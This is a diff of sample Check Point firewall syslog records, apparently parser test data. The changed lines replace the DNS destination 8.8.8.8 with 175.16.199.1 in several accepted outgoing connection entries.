-<134>1 2020-03-29T23:18:03Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e812cab,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585523883"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"40830"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T23:18:13Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e812cb5,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585523893"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"53107"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T23:18:23Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e812cbf,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585523903"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"55748"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T23:18:33Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e812cc9,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585523913"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"35236"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T23:18:03Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e812cab,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585523883"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"40830"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T23:18:13Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e812cb5,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585523893"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"53107"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T23:18:23Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e812cbf,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585523903"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"55748"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T23:18:33Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e812cc9,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585523913"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"35236"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T23:18:34Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e812cca,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.153"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"43103"; service:"514"; service_id:"syslog"; src:"192.168.1.100"]
-<134>1 2020-03-29T23:18:43Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e812cd3,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585523923"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"56312"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T23:18:43Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e812cd3,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585523923"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"56312"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T23:18:43Z gw-da58d3 CheckPoint 8363 - [flags:"133440"; ifdir:"inbound"; loguid:"{0x5e812cd4,0x0,0x6401a8c0,0x108620ab}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; description:"Contracts"; product:"Security Gateway/Management"; status:"Started"; update_service:"1"; version:"1.0"]
 <134>1 2020-03-29T23:18:43Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e812cd3,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"40116"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
 <134>1 2020-03-29T23:18:43Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e812cd3,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"194.29.39.10"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"41646"; service:"443"; service_id:"https"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"10858"; xlatesrc:"0.0.0.0"]
@@ -6940,9 +6940,9 @@
 <134>1 2020-03-29T23:18:43Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e812cd3,0x5,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"7"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"40693"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
 <134>1 2020-03-29T23:18:44Z gw-da58d3 CheckPoint 8363 - [flags:"133440"; ifdir:"inbound"; loguid:"{0x5e812cd4,0x1,0x6401a8c0,0x108620ab}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; comment:"No update was found"; description:"Contracts"; product:"Security Gateway/Management"; status:"Finished"; update_service:"1"; version:"1.0"]
 <134>1 2020-03-29T23:18:43Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e812cd3,0x6,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"8"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.124.249.41"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"61180"; service:"80"; service_id:"http"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"10860"; xlatesrc:"0.0.0.0"]
-<134>1 2020-03-29T23:18:53Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e812cdd,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585523933"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"55039"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T23:18:53Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e812cdd,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585523933"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"55039"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T23:18:54Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e812cde,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.153"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"60640"; service:"514"; service_id:"syslog"; src:"192.168.1.100"]
-<134>1 2020-03-29T23:19:03Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e812ce7,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585523943"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"60281"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T23:19:03Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e812ce7,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585523943"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"60281"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T23:19:06Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e812cea,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"162.159.200.123"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"57980"; service:"123"; service_id:"ntp-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T23:19:09Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e812ced,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.100"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"52357"; service:"443"; service_id:"https"; src:"192.168.1.117"]
 <134>1 2020-03-29T23:19:09Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e812ced,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.100"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"52358"; service:"443"; service_id:"https"; src:"192.168.1.117"]
@@ -6968,35 +6968,35 @@
 <134>1 2020-03-29T23:20:18Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e812d31,0x4,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"43646"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
 <134>1 2020-03-29T23:20:18Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e812d31,0x5,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.124.249.31"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"41144"; service:"80"; service_id:"http"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"10866"; xlatesrc:"0.0.0.0"]
 <134>1 2020-03-29T23:20:18Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e812d32,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.153"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"43103"; service:"514"; service_id:"syslog"; src:"192.168.1.100"]
-<134>1 2020-03-29T23:20:43Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e812d4b,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"39331"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T23:20:43Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e812d4b,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"39331"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T23:20:52Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e812d53,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.255"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"138"; service:"138"; service_id:"nbdatagram"; src:"192.168.1.1"]
